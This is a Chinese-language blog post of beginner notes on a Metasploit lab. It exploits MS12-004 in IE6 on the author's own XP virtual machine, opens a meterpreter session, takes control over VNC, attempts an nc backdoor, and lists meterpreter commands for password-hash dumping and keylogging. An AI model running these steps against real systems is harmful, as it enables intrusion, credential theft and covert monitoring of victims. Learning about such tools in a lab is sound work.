metasploit渗透测试学习笔记（一）

对metasploit非常感兴趣，所以最近看了很多的教程。这篇是我模仿作者Breaker写的一篇入门级渗透，真的很入门。还望大神忽视。 

单纯的想记录下我学习的结果zzzzzzzzzzzzzzzzzzzzz

环境：

1.kali Linux。

2.XP  IE6。

好的，如下zzz：

1.msfconsole

2输入命令 search ms12_004，找 ms12-004 漏洞的利用模块

3.使用那个模块

4.设置一些参数：SRVHOST，payload（载荷） LHOST, URIPATH 

5显示参数 show options

6.利用exploit

7用另一个虚拟机XP进入Using URL ：http://192.168.10.134:8080/

它已卡死，接着浏览器自动退了吧。
8.Sucessfully！ 查看会话：sessions

9.连接会话sessions -i 1，进入了meterpreter，并截图，。

10.run vnc虚拟连接进入，控制主机

11.当然这样不算完结，还要留后门，下次进入。Upload一个nc，（⑥⑥⑥的瑞士军刀）

蛋蛋蛋但是，后门我不会啊，试了好多次没成功，感觉好难搞似得，下次再研究，这次先到这了，已成功拿下我的XP。。。。

好菜 。。。。好水，不怎么懂郁闷。。。。。。。。。。。。。。。。。。 

我去喝杯饮料压压惊。。。。。

常用的 Meterpreter命令

Meterpreter 是一个很强大的payload ， 具体说明输入help可以看到，

Meterpreter hashdump // 可以看到进程主机帐号和加密后的密码

 keyscan_start //开启键盘记录

heyscan_dump // 查看键盘记

 keyscan_stop // 关闭键盘

 ps // 获取进程主机进程列表

好了感谢教程所有者：Breaker。！！  虽然不认识，但是给了我好大帮助，特别信心啊！！！

（ps：后门不怎么懂(⊙o⊙)。）。哪位大神能否交流交流~~~~~~~~~~~~。

还有1分钟熄灯了，赶紧上传睡觉。

By：Zofrey